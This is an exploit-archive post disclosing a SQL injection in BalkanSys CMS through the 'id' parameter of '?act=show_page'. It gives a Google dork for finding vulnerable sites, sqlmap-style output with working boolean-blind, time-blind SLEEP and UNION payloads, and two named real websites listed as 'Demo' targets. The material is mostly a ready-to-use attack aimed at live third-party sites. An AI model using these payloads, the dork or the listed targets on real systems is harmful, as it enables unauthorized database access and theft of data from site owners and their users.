BalkanSys CMS show_pageID SQL injection

Posted on 30 November -0001
<HTML><HEAD><TITLE>BalkanSys CMS show_pageID SQL injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>######################
# Exploit Title :  BalkanSys CMS show_pageID SQL injection
# Exploit Author : xBADGIRL21
# Dork : inurl:/?act=show_page or inurl:/?act=show_page  "Balkansys"
# Category: [ Webapps ]
# version: BalkanSys CMS 2.x - 3.x
# Tested on: [ Linux | Windows ]
# Vendore : http://balkansys.com/
# skype:xbadgirl21
# Date: 2016/07/07
# video Proof : https://youtu.be/pdLAMA2bBrQ
######################
# PoC:
# http://www.site.com/?act=show_page&id=[SQLi]
######################
+ test:=> http://www.site.com/?act=show_page&id=[76] INJECT HERE
# respone:==>
# [09:39:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' " injectable "
# Parameter: id (GET)
#    Type: boolean-based blind
#    Title: AND boolean-based blind - WHERE or HAVING clause
#    Payload: act=show_page&id=76' AND 9301=9301 AND 'thUL'='thUL
#
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
#    Payload: act=show_page&id=76' AND (SELECT * FROM (SELECT(SLEEP(5)))oZvn) AND 'ysNR'='ysNR
#
#    Type: UNION query
#    Title: Generic UNION query (NULL) - 19 columns
#    Payload: act=show_page&id=-8914' UNION ALL SELECT #NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627671,0x4d4b6d63774a4d4e546c,0x717a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+ Demo
+ http://optela.com/?act=show_page&id=76
+ http://saturaad.com/?act=show_page&id=165
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
</BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20